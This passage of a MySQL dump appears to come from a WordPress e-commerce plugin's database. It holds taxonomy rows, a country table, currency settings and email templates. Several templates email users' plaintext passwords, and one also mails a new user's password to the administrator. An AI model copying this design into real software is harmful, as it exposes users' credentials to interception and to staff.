(550, 550, 'post_tag', '', 0, 1),
(551, 551, 'post_tag', '', 0, 1),
(552, 552, 'post_tag', '', 0, 1),
(553, 553, 'post_tag', '', 0, 1),
(554, 554, 'post_tag', '', 0, 1),
(555, 555, 'post_tag', '', 0, 1),
(556, 556, 'post_tag', '', 0, 1),
(557, 557, 'post_tag', '', 0, 1),
(558, 558, 'post_tag', '', 0, 1),
(559, 559, 'post_tag', '', 0, 1),
(560, 560, 'post_tag', '', 0, 1),
(561, 561, 'post_tag', '', 0, 1),
(562, 562, 'post_tag', '', 0, 1),
(563, 563, 'post_tag', '', 0, 1),
(564, 564, 'post_tag', '', 0, 1),
(565, 565, 'post_tag', '', 0, 1),
(566, 566, 'post_tag', '', 0, 1),
(567, 567, 'post_tag', '', 0, 1),
(568, 568, 'post_tag', '', 0, 1),
(569, 569, 'post_tag', '', 0, 1),
(570, 570, 'post_tag', '', 0, 1),
(571, 571, 'post_tag', '', 0, 1),
(572, 572, 'post_tag', '', 0, 1),
(573, 573, 'post_tag', '', 0, 1),
(574, 574, 'post_tag', '', 0, 1),
(575, 575, 'post_tag', '', 0, 1),
(576, 576, 'post_tag', '', 0, 1),
(577, 577, 'post_tag', '', 0, 1),
(578, 578, 'post_tag', '', 0, 1),
(579, 579, 'post_tag', '', 0, 1),
(580, 580, 'post_tag', '', 0, 1),
(581, 581, 'post_tag', '', 0, 1),
(582, 582, 'post_tag', '', 0, 2),
(583, 583, 'post_tag', '', 0, 1),
(584, 584, 'post_tag', '', 0, 1),
(585, 585, 'post_tag', '', 0, 1),
(586, 586, 'post_tag', '', 0, 1),
(587, 587, 'post_tag', '', 0, 1),
(588, 588, 'post_tag', '', 0, 1),
(589, 589, 'post_tag', '', 0, 1),
(590, 590, 'post_tag', '', 0, 1),
(591, 591, 'post_tag', '', 0, 1),
(592, 592, 'post_tag', '', 0, 1),
(593, 593, 'post_tag', '', 0, 1),
(594, 594, 'post_tag', '', 0, 1),
(595, 595, 'post_tag', '', 0, 1),
(596, 596, 'post_tag', '', 0, 1),
(597, 597, 'post_tag', '', 0, 1),
(598, 598, 'post_tag', '', 0, 1),
(599, 599, 'post_tag', '', 0, 1),
(600, 600, 'post_tag', '', 0, 1),
(601, 601, 'post_tag', '', 0, 1),
(602, 602, 'post_tag', '', 0, 1),
(603, 603, 'post_tag', '', 0, 1),
(604, 604, 'post_tag', '', 0, 1),
(605, 605, 'post_tag', '', 0, 1),
(606, 606, 'post_tag', '', 0, 1),
(607, 607, 'post_tag', '', 0, 1),
(608, 608, 'post_tag', '', 0, 1),
(609, 609, 'post_tag', '', 0, 1),
(610, 610, 'post_tag', '', 0, 1),
(611, 611, 'post_tag', '', 0, 1),
(612, 612, 'post_tag', '', 0, 1),
(613, 613, 'post_tag', '', 0, 1),
(614, 614, 'post_tag', '', 0, 1),
(615, 615, 'post_tag', '', 0, 1),
(616, 616, 'post_tag', '', 0, 1),
(617, 617, 'post_tag', '', 0, 1),
(618, 618, 'post_tag', '', 0, 1),
(619, 619, 'post_tag', '', 0, 1),
(620, 620, 'post_tag', '', 0, 1),
(621, 621, 'post_tag', '', 0, 1),
(622, 622, 'post_tag', '', 0, 1),
(623, 623, 'post_tag', '', 0, 1),
(624, 624, 'post_tag', '', 0, 1),
(625, 625, 'post_tag', '', 0, 1),
(626, 626, 'post_tag', '', 0, 1),
(627, 627, 'post_tag', '', 0, 1),
(628, 628, 'post_tag', '', 0, 1),
(629, 629, 'post_tag', '', 0, 1),
(630, 630, 'post_tag', '', 0, 1),
(631, 631, 'post_tag', '', 0, 1),
(632, 632, 'post_tag', '', 0, 1),
(633, 633, 'post_tag', '', 0, 1),
(634, 634, 'post_tag', '', 0, 1),
(635, 635, 'post_tag', '', 0, 1),
(636, 636, 'post_tag', '', 0, 1),
(637, 637, 'post_tag', '', 0, 1),
(638, 638, 'post_tag', '', 0, 1),
(639, 639, 'post_tag', '', 0, 1),
(640, 640, 'post_tag', '', 0, 1),
(641, 641, 'post_tag', '', 0, 1),
(642, 642, 'post_tag', '', 0, 1),
(643, 643, 'post_tag', '', 0, 1),
(644, 644, 'post_tag', '', 0, 1),
(645, 645, 'post_tag', '', 0, 1),
(646, 646, 'post_tag', '', 0, 1),
(647, 647, 'post_tag', '', 0, 1),
(648, 648, 'post_tag', '', 0, 1),
(649, 649, 'post_tag', '', 0, 1),
(650, 650, 'post_tag', '', 0, 1),
(651, 651, 'post_tag', '', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_cart`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_cart` (
  `user_id` int(11) NOT NULL,
  `content` text NOT NULL,
  `updated` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_content_img`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_content_img` (
  `img_id` int(11) NOT NULL,
  `pid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`img_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `cyb_toe_content_img`
--

INSERT INTO `cyb_toe_content_img` (`img_id`, `pid`) VALUES
(193, 100),
(214, 0),
(216, 0),
(217, 0),
(219, 2),
(220, 2),
(221, 2),
(222, 2),
(223, 2),
(225, 2),
(227, 0),
(228, 0),
(229, 0),
(230, 0),
(231, 0),
(232, 0),
(233, 0),
(234, 0),
(235, 0),
(236, 0),
(237, 0),
(238, 0),
(239, 0),
(240, 0),
(241, 0),
(242, 0),
(243, 0),
(244, 0),
(245, 0),
(246, 0),
(247, 0),
(248, 0),
(249, 0),
(250, 0),
(251, 0),
(252, 0),
(253, 0),
(254, 0),
(255, 0),
(256, 0),
(257, 0),
(258, 0),
(259, 0),
(260, 0),
(261, 0),
(262, 0),
(263, 0),
(264, 0),
(265, 0),
(266, 0),
(267, 0),
(268, 0),
(269, 0),
(270, 0),
(289, 0),
(293, 2),
(294, 0),
(295, 0),
(296, 0),
(297, 0),
(298, 0),
(299, 0),
(300, 0),
(302, 2),
(303, 2),
(304, 2),
(305, 2),
(308, 2),
(309, 2),
(310, 2),
(311, 2),
(312, 2),
(313, 2),
(314, 2),
(315, 2),
(316, 2),
(317, 2),
(318, 2),
(320, 0),
(321, 0),
(322, 0),
(323, 0),
(324, 0),
(328, 2),
(375, 367),
(378, 367),
(384, 367),
(386, 367),
(396, 367),
(429, 367),
(430, 367),
(432, 367),
(433, 367),
(475, 367),
(488, 0),
(490, 367),
(546, 0),
(547, 0),
(551, 0),
(679, 666),
(680, 666),
(681, 666),
(682, 666),
(683, 666),
(684, 666),
(702, 666),
(712, 0),
(738, 666),
(741, 666),
(746, 666),
(747, 666),
(755, 666),
(756, 666),
(877, 790),
(955, 915),
(956, 915),
(957, 915),
(958, 915),
(959, 915),
(960, 915),
(961, 915),
(962, 915),
(963, 915),
(964, 915),
(965, 915),
(966, 915),
(967, 915),
(968, 915),
(969, 915),
(970, 915),
(971, 915),
(972, 915),
(973, 915),
(974, 915),
(985, 915),
(986, 915),
(1013, 139),
(1014, 139),
(1015, 139),
(1016, 139),
(1017, 139),
(1018, 139),
(1019, 139),
(1020, 139),
(1021, 139),
(1029, 915),
(1053, 915),
(1106, 1104),
(1139, 139),
(1143, 139),
(1145, 139),
(1147, 139),
(1156, 139),
(1163, 139),
(1214, 0),
(1296, 1295),
(1311, 116),
(1322, 1321),
(1346, 1332),
(1347, 1332),
(1348, 1332),
(1349, 1332),
(1363, 1321),
(1369, 1328),
(1371, 1335),
(1377, 1330),
(1395, 1288),
(1401, 0),
(1402, 0),
(1433, 1421),
(1445, 1421),
(1452, 0),
(1453, 0),
(1454, 0),
(1455, 0),
(1457, 1450),
(1461, 0),
(1468, 1450),
(1471, 1450),
(1474, 1450),
(1475, 1450),
(1476, 1450),
(1482, 1450),
(1483, 1450),
(1484, 1450),
(1485, 1450),
(1486, 1450),
(1489, 1450),
(1494, 0),
(1497, 0),
(1518, 0),
(1521, 0),
(1550, 0),
(1559, 0),
(1564, 0),
(1566, 0),
(1653, 1450),
(1659, 1450),
(1682, 1450),
(1696, 1450),
(1697, 1450),
(1700, 1450),
(1708, 1340),
(1714, 1288),
(1717, 1288),
(1728, 0),
(1779, 0),
(1780, 0),
(1781, 0),
(1788, 0),
(1789, 0),
(1790, 0),
(1791, 0),
(1792, 0),
(1796, 0),
(1798, 0),
(1839, 0),
(1851, 1450),
(1862, 1450),
(1875, 1197),
(1893, 1197),
(1944, 0),
(1946, 1941),
(1947, 1941),
(1948, 1941),
(1951, 0),
(1952, 0),
(1953, 0),
(1955, 0),
(2007, 0),
(2062, 2061),
(2079, 0),
(2107, 2106),
(2110, 125),
(2221, 0),
(2232, 0),
(2258, 2244),
(2260, 2244),
(2261, 2244),
(2345, 0),
(2347, 2346),
(2414, 2071),
(2427, 0),
(2488, 2486),
(2491, 0),
(2507, 0),
(2509, 0),
(2510, 2506),
(2511, 2506),
(2512, 2506),
(2513, 2486),
(2718, 0),
(2854, 0),
(2855, 0),
(3024, 0),
(3085, 2071),
(3086, 2071),
(3119, 0),
(3151, 0),
(3509, 0),
(3571, 0),
(3867, 0),
(3956, 0),
(3957, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_countries`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_countries` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(128) NOT NULL,
  `iso_code_2` varchar(2) DEFAULT NULL,
  `iso_code_3` varchar(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=241 ;

--
-- Dumping data for table `cyb_toe_countries`
--

INSERT INTO `cyb_toe_countries` (`id`, `name`, `iso_code_2`, `iso_code_3`) VALUES
(1, 'Afghanistan', 'AF', 'AFG'),
(2, 'Albania', 'AL', 'ALB'),
(3, 'Algeria', 'DZ', 'DZA'),
(4, 'American Samoa', 'AS', 'ASM'),
(5, 'Andorra', 'AD', 'AND'),
(6, 'Angola', 'AO', 'AGO'),
(7, 'Anguilla', 'AI', 'AIA'),
(8, 'Antarctica', 'AQ', 'ATA'),
(9, 'Antigua and Barbuda', 'AG', 'ATG'),
(10, 'Argentina', 'AR', 'ARG'),
(11, 'Armenia', 'AM', 'ARM'),
(12, 'Aruba', 'AW', 'ABW'),
(13, 'Australia', 'AU', 'AUS'),
(14, 'Austria', 'AT', 'AUT'),
(15, 'Azerbaijan', 'AZ', 'AZE'),
(16, 'Bahamas', 'BS', 'BHS'),
(17, 'Bahrain', 'BH', 'BHR'),
(18, 'Bangladesh', 'BD', 'BGD'),
(19, 'Barbados', 'BB', 'BRB'),
(20, 'Belarus', 'BY', 'BLR'),
(21, 'Belgium', 'BE', 'BEL'),
(22, 'Belize', 'BZ', 'BLZ'),
(23, 'Benin', 'BJ', 'BEN'),
(24, 'Bermuda', 'BM', 'BMU'),
(25, 'Bhutan', 'BT', 'BTN'),
(26, 'Bolivia', 'BO', 'BOL'),
(27, 'Bosnia and Herzegowina', 'BA', 'BIH'),
(28, 'Botswana', 'BW', 'BWA'),
(29, 'Bouvet Island', 'BV', 'BVT'),
(30, 'Brazil', 'BR', 'BRA'),
(31, 'British Indian Ocean Territory', 'IO', 'IOT'),
(32, 'Brunei Darussalam', 'BN', 'BRN'),
(33, 'Bulgaria', 'BG', 'BGR'),
(34, 'Burkina Faso', 'BF', 'BFA'),
(35, 'Burundi', 'BI', 'BDI'),
(36, 'Cambodia', 'KH', 'KHM'),
(37, 'Cameroon', 'CM', 'CMR'),
(38, 'Canada', 'CA', 'CAN'),
(39, 'Cape Verde', 'CV', 'CPV'),
(40, 'Cayman Islands', 'KY', 'CYM'),
(41, 'Central African Republic', 'CF', 'CAF'),
(42, 'Chad', 'TD', 'TCD'),
(43, 'Chile', 'CL', 'CHL'),
(44, 'China', 'CN', 'CHN'),
(45, 'Christmas Island', 'CX', 'CXR'),
(46, 'Cocos (Keeling) Islands', 'CC', 'CCK'),
(47, 'Colombia', 'CO', 'COL'),
(48, 'Comoros', 'KM', 'COM'),
(49, 'Congo', 'CG', 'COG'),
(50, 'Cook Islands', 'CK', 'COK'),
(51, 'Costa Rica', 'CR', 'CRI'),
(52, 'Cote D''Ivoire', 'CI', 'CIV'),
(53, 'Croatia', 'HR', 'HRV'),
(54, 'Cuba', 'CU', 'CUB'),
(55, 'Cyprus', 'CY', 'CYP'),
(56, 'Czech Republic', 'CZ', 'CZE'),
(57, 'Denmark', 'DK', 'DNK'),
(58, 'Djibouti', 'DJ', 'DJI'),
(59, 'Dominica', 'DM', 'DMA'),
(60, 'Dominican Republic', 'DO', 'DOM'),
(61, 'East Timor', 'TP', 'TMP'),
(62, 'Ecuador', 'EC', 'ECU'),
(63, 'Egypt', 'EG', 'EGY'),
(64, 'El Salvador', 'SV', 'SLV'),
(65, 'Equatorial Guinea', 'GQ', 'GNQ'),
(66, 'Eritrea', 'ER', 'ERI'),
(67, 'Estonia', 'EE', 'EST'),
(68, 'Ethiopia', 'ET', 'ETH'),
(69, 'Falkland Islands (Malvinas)', 'FK', 'FLK'),
(70, 'Faroe Islands', 'FO', 'FRO'),
(71, 'Fiji', 'FJ', 'FJI'),
(72, 'Finland', 'FI', 'FIN'),
(73, 'France', 'FR', 'FRA'),
(74, 'France, Metropolitan', 'FX', 'FXX'),
(75, 'French Guiana', 'GF', 'GUF'),
(76, 'French Polynesia', 'PF', 'PYF'),
(77, 'French Southern Territories', 'TF', 'ATF'),
(78, 'Gabon', 'GA', 'GAB'),
(79, 'Gambia', 'GM', 'GMB'),
(80, 'Georgia', 'GE', 'GEO'),
(81, 'Germany', 'DE', 'DEU'),
(82, 'Ghana', 'GH', 'GHA'),
(83, 'Gibraltar', 'GI', 'GIB'),
(84, 'Greece', 'GR', 'GRC'),
(85, 'Greenland', 'GL', 'GRL'),
(86, 'Grenada', 'GD', 'GRD'),
(87, 'Guadeloupe', 'GP', 'GLP'),
(88, 'Guam', 'GU', 'GUM'),
(89, 'Guatemala', 'GT', 'GTM'),
(90, 'Guinea', 'GN', 'GIN'),
(91, 'Guinea-bissau', 'GW', 'GNB'),
(92, 'Guyana', 'GY', 'GUY'),
(93, 'Haiti', 'HT', 'HTI'),
(94, 'Heard and Mc Donald Islands', 'HM', 'HMD'),
(95, 'Honduras', 'HN', 'HND'),
(96, 'Hong Kong', 'HK', 'HKG'),
(97, 'Hungary', 'HU', 'HUN'),
(98, 'Iceland', 'IS', 'ISL'),
(99, 'India', 'IN', 'IND'),
(100, 'Indonesia', 'ID', 'IDN'),
(101, 'Iran (Islamic Republic of)', 'IR', 'IRN'),
(102, 'Iraq', 'IQ', 'IRQ'),
(103, 'Ireland', 'IE', 'IRL'),
(104, 'Israel', 'IL', 'ISR'),
(105, 'Italy', 'IT', 'ITA'),
(106, 'Jamaica', 'JM', 'JAM'),
(107, 'Japan', 'JP', 'JPN'),
(108, 'Jordan', 'JO', 'JOR'),
(109, 'Kazakhstan', 'KZ', 'KAZ'),
(110, 'Kenya', 'KE', 'KEN'),
(111, 'Kiribati', 'KI', 'KIR'),
(112, 'Korea, Democratic People''s Republic of', 'KP', 'PRK'),
(113, 'Korea, Republic of', 'KR', 'KOR'),
(114, 'Kuwait', 'KW', 'KWT'),
(115, 'Kyrgyzstan', 'KG', 'KGZ'),
(116, 'Lao People''s Democratic Republic', 'LA', 'LAO'),
(117, 'Latvia', 'LV', 'LVA'),
(118, 'Lebanon', 'LB', 'LBN'),
(119, 'Lesotho', 'LS', 'LSO'),
(120, 'Liberia', 'LR', 'LBR'),
(121, 'Libyan Arab Jamahiriya', 'LY', 'LBY'),
(122, 'Liechtenstein', 'LI', 'LIE'),
(123, 'Lithuania', 'LT', 'LTU'),
(124, 'Luxembourg', 'LU', 'LUX'),
(125, 'Macau', 'MO', 'MAC'),
(126, 'Macedonia, The Former Yugoslav Republic of', 'MK', 'MKD'),
(127, 'Madagascar', 'MG', 'MDG'),
(128, 'Malawi', 'MW', 'MWI'),
(129, 'Malaysia', 'MY', 'MYS'),
(130, 'Maldives', 'MV', 'MDV'),
(131, 'Mali', 'ML', 'MLI'),
(132, 'Malta', 'MT', 'MLT'),
(133, 'Marshall Islands', 'MH', 'MHL'),
(134, 'Martinique', 'MQ', 'MTQ'),
(135, 'Mauritania', 'MR', 'MRT'),
(136, 'Mauritius', 'MU', 'MUS'),
(137, 'Mayotte', 'YT', 'MYT'),
(138, 'Mexico', 'MX', 'MEX'),
(139, 'Micronesia, Federated States of', 'FM', 'FSM'),
(140, 'Moldova, Republic of', 'MD', 'MDA'),
(141, 'Monaco', 'MC', 'MCO'),
(142, 'Mongolia', 'MN', 'MNG'),
(143, 'Montenegro', 'ME', 'MNE'),
(144, 'Montserrat', 'MS', 'MSR'),
(145, 'Morocco', 'MA', 'MAR'),
(146, 'Mozambique', 'MZ', 'MOZ'),
(147, 'Myanmar', 'MM', 'MMR'),
(148, 'Namibia', 'NA', 'NAM'),
(149, 'Nauru', 'NR', 'NRU'),
(150, 'Nepal', 'NP', 'NPL'),
(151, 'Netherlands', 'NL', 'NLD'),
(152, 'Netherlands Antilles', 'AN', 'ANT'),
(153, 'New Caledonia', 'NC', 'NCL'),
(154, 'New Zealand', 'NZ', 'NZL'),
(155, 'Nicaragua', 'NI', 'NIC'),
(156, 'Niger', 'NE', 'NER'),
(157, 'Nigeria', 'NG', 'NGA'),
(158, 'Niue', 'NU', 'NIU'),
(159, 'Norfolk Island', 'NF', 'NFK'),
(160, 'Northern Mariana Islands', 'MP', 'MNP'),
(161, 'Norway', 'NO', 'NOR'),
(162, 'Oman', 'OM', 'OMN'),
(163, 'Pakistan', 'PK', 'PAK'),
(164, 'Palau', 'PW', 'PLW'),
(165, 'Panama', 'PA', 'PAN'),
(166, 'Papua New Guinea', 'PG', 'PNG'),
(167, 'Paraguay', 'PY', 'PRY'),
(168, 'Peru', 'PE', 'PER'),
(169, 'Philippines', 'PH', 'PHL'),
(170, 'Pitcairn', 'PN', 'PCN'),
(171, 'Poland', 'PL', 'POL'),
(172, 'Portugal', 'PT', 'PRT'),
(173, 'Puerto Rico', 'PR', 'PRI'),
(174, 'Qatar', 'QA', 'QAT'),
(175, 'Reunion', 'RE', 'REU'),
(176, 'Romania', 'RO', 'ROM'),
(177, 'Russian Federation', 'RU', 'RUS'),
(178, 'Rwanda', 'RW', 'RWA'),
(179, 'Saint Kitts and Nevis', 'KN', 'KNA'),
(180, 'Saint Lucia', 'LC', 'LCA'),
(181, 'Saint Vincent and the Grenadines', 'VC', 'VCT'),
(182, 'Samoa', 'WS', 'WSM'),
(183, 'San Marino', 'SM', 'SMR'),
(184, 'Sao Tome and Principe', 'ST', 'STP'),
(185, 'Saudi Arabia', 'SA', 'SAU'),
(186, 'Senegal', 'SN', 'SEN'),
(187, 'Serbia', 'RS', 'SRB'),
(188, 'Seychelles', 'SC', 'SYC'),
(189, 'Sierra Leone', 'SL', 'SLE'),
(190, 'Singapore', 'SG', 'SGP'),
(191, 'Slovakia (Slovak Republic)', 'SK', 'SVK'),
(192, 'Slovenia', 'SI', 'SVN'),
(193, 'Solomon Islands', 'SB', 'SLB'),
(194, 'Somalia', 'SO', 'SOM'),
(195, 'South Africa', 'ZA', 'ZAF'),
(196, 'South Georgia and the South Sandwich Islands', 'GS', 'SGS'),
(197, 'Spain', 'ES', 'ESP'),
(198, 'Sri Lanka', 'LK', 'LKA'),
(199, 'St. Helena', 'SH', 'SHN'),
(200, 'St. Pierre and Miquelon', 'PM', 'SPM'),
(201, 'Sudan', 'SD', 'SDN'),
(202, 'Suriname', 'SR', 'SUR'),
(203, 'Svalbard and Jan Mayen Islands', 'SJ', 'SJM'),
(204, 'Swaziland', 'SZ', 'SWZ'),
(205, 'Sweden', 'SE', 'SWE'),
(206, 'Switzerland', 'CH', 'CHE'),
(207, 'Syrian Arab Republic', 'SY', 'SYR'),
(208, 'Taiwan', 'TW', 'TWN'),
(209, 'Tajikistan', 'TJ', 'TJK'),
(210, 'Tanzania, United Republic of', 'TZ', 'TZA'),
(211, 'Thailand', 'TH', 'THA'),
(212, 'Togo', 'TG', 'TGO'),
(213, 'Tokelau', 'TK', 'TKL'),
(214, 'Tonga', 'TO', 'TON'),
(215, 'Trinidad and Tobago', 'TT', 'TTO'),
(216, 'Tunisia', 'TN', 'TUN'),
(217, 'Turkey', 'TR', 'TUR'),
(218, 'Turkmenistan', 'TM', 'TKM'),
(219, 'Turks and Caicos Islands', 'TC', 'TCA'),
(220, 'Tuvalu', 'TV', 'TUV'),
(221, 'Uganda', 'UG', 'UGA'),
(222, 'Ukraine', 'UA', 'UKR'),
(223, 'United Arab Emirates', 'AE', 'ARE'),
(224, 'United Kingdom', 'GB', 'GBR'),
(225, 'United States', 'US', 'USA'),
(226, 'United States Minor Outlying Islands', 'UM', 'UMI'),
(227, 'Uruguay', 'UY', 'URY'),
(228, 'Uzbekistan', 'UZ', 'UZB'),
(229, 'Vanuatu', 'VU', 'VUT'),
(230, 'Vatican City State (Holy See)', 'VA', 'VAT'),
(231, 'Venezuela', 'VE', 'VEN'),
(232, 'Viet Nam', 'VN', 'VNM'),
(233, 'Virgin Islands (British)', 'VG', 'VGB'),
(234, 'Virgin Islands (U.S.)', 'VI', 'VIR'),
(235, 'Wallis and Futuna Islands', 'WF', 'WLF'),
(236, 'Western Sahara', 'EH', 'ESH'),
(237, 'Yemen', 'YE', 'YEM'),
(238, 'Zaire', 'ZR', 'ZAR'),
(239, 'Zambia', 'ZM', 'ZMB'),
(240, 'Zimbabwe', 'ZW', 'ZWE');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_currency`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_currency` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(32) NOT NULL,
  `label` varchar(128) NOT NULL,
  `value` float(9,3) DEFAULT NULL,
  `symbol` varchar(16) DEFAULT NULL,
  `symbol_left` varchar(32) DEFAULT NULL,
  `symbol_right` varchar(32) DEFAULT NULL,
  `symbol_point` varchar(2) DEFAULT NULL,
  `symbol_thousand` varchar(2) DEFAULT NULL,
  `decimal_places` smallint(2) NOT NULL DEFAULT '2',
  `use_as_default` tinyint(1) NOT NULL DEFAULT '0',
  `currency_view` varchar(32) DEFAULT NULL,
  `price_view` varchar(32) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=5 ;

--
-- Dumping data for table `cyb_toe_currency`
--

INSERT INTO `cyb_toe_currency` (`id`, `code`, `label`, `value`, `symbol`, `symbol_left`, `symbol_right`, `symbol_point`, `symbol_thousand`, `decimal_places`, `use_as_default`, `currency_view`, `price_view`) VALUES
(1, 'USD', 'US Dollar', 1.000, '$', '$ ', '', '', ' ', 0, 1, '$ 1', '100 000'),
(2, 'EUR', 'Euro', 1.230, 'EUR', '', ' EUR', '.', ',', 2, 0, '1EUR', '100 000,00'),
(4, '', '', 1.000, '$', '$', '', ',', '.', 2, 0, '$1', '100,000.00');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_ef_options`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_ef_options` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ef_id` int(11) NOT NULL,
  `value` varchar(255) NOT NULL,
  `data` text,
  `price` decimal(10,2) NOT NULL DEFAULT '0.00',
  `price_absolute` tinyint(1) NOT NULL DEFAULT '0',
  `sort_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=11 ;

--
-- Dumping data for table `cyb_toe_ef_options`
--

INSERT INTO `cyb_toe_ef_options` (`id`, `ef_id`, `value`, `data`, `price`, `price_absolute`, `sort_order`) VALUES
(1, 9, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(2, 3, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(3, 4, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(4, 5, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(5, 6, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(6, 7, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(7, 8, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(8, 12, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(9, 13, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0),
(10, 14, 'EMPTY', '{"price":0,"weight":0,"onlyForPids":[]}', '0.00', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_ef_val`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_ef_val` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `parent_type` varchar(32) NOT NULL,
  `ef_id` int(11) NOT NULL,
  `opt_id` int(11) NOT NULL DEFAULT '0',
  `value` longtext NOT NULL,
  `cost` decimal(10,2) NOT NULL DEFAULT '0.00',
  `price` decimal(10,2) NOT NULL DEFAULT '0.00',
  `price_absolute` tinyint(1) NOT NULL DEFAULT '0',
  `disabled` tinyint(1) NOT NULL DEFAULT '0',
  `sort_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `parent_id` (`parent_id`,`ef_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `cyb_toe_ef_val`
--

INSERT INTO `cyb_toe_ef_val` (`id`, `parent_id`, `parent_type`, `ef_id`, `opt_id`, `value`, `cost`, `price`, `price_absolute`, `disabled`, `sort_order`) VALUES
(1, 0, 'user', 12, 0, '5bSkcI68uq0b', '0.00', '0.00', 0, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_email_templates`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_email_templates` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(128) NOT NULL,
  `subject` varchar(255) NOT NULL,
  `body` text NOT NULL,
  `variables` text NOT NULL,
  `active` tinyint(1) NOT NULL,
  `name` varchar(128) NOT NULL,
  `module` varchar(128) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `name` (`name`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=7 ;

--
-- Dumping data for table `cyb_toe_email_templates`
--

INSERT INTO `cyb_toe_email_templates` (`id`, `label`, `subject`, `body`, `variables`, `active`, `name`, `module`) VALUES
(1, 'Digital product links', 'Ordered files from :store_name', 'Hello, :user_name <br />\r\nYou made an Order #:order_id at :store_name. <br />\r\nOrder Products List: <br />\r\n:products\r\n<br />\r\nYou can download your files with the links below: <br />\r\n:links \r\n<br />\r\nOr at your account page.\r\n<br />\r\nThanks for your purchase at :store_name.', '["user_name", "store_name", "products", "links", "order_id"]', 1, 'links_list', 'digital_product'),
(2, 'Order success placement', 'Your order at :store_name', 'Hello, :user_name <br />\r\nYou made an Order #:order_id at :store_name. <br />\r\n:order_info\r\n<br />\r\nThanks for your purchase at :store_name.', '["user_name", "store_name", "order_info", "order_id", "account_login_link"]', 1, 'success_placement', 'order'),
(3, 'Registration success', 'Registration at :store_name', 'Hello, :username <br />\r\nYou have been registered at :store_name. <br />\r\nYou login info: <br />\r\nUsername: :username<br />\r\nPassword: :password<br />\r\nThanks for using our online store!', '["username", "store_name", "password"]', 1, 'registration', 'user'),
(4, 'Password Reset', 'Password Reset at :store_name', 'Hello, :first_name <br />\r\nYour new password at :store_name are:<br />\r\nPassword: :password<br />\r\nThanks for using our online store!', '["first_name", "store_name", "password"]', 1, 'reset_password', 'user'),
(5, 'Password Reset Request', 'Password Reset Request at :store_name', 'Hello, :first_name <br />\r\nYou requested password reset at :store_name.<br />\r\nFollow this link<br />\r\n<a href=":reset_link">:reset_link</a><br />\r\nto complete your request.', '["first_name", "store_name", "reset_link"]', 1, 'reset_password_request', 'user'),
(6, 'New user registration', 'New user registration at :store_name', 'New user registered at :store_name. <br />\r\nUser info: <br />\r\nUsername: :username<br />\r\nPassword: :password<br />\r\nFirst Name: :first_name<br />\r\nLast Name: :last_name<br />\r\nEmail: :email<br />\r\nThanks for using our online store!', '["username", "store_name", "password", "first_name", "last_name", "email"]', 1, 'admin_notify', 'user');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_extrafields`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_extrafields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(32) NOT NULL,
  `parent` varchar(32) NOT NULL,
  `htmltype_id` smallint(2) NOT NULL DEFAULT '1',
  `default_value` varchar(128) DEFAULT NULL,
  `params` text,
  `label` varchar(128) NOT NULL,
  `description` text,
  `destination` text,
  `mandatory` tinyint(1) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `validate` varchar(128) DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '1',
  `system` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=15 ;

--
-- Dumping data for table `cyb_toe_extrafields`
--

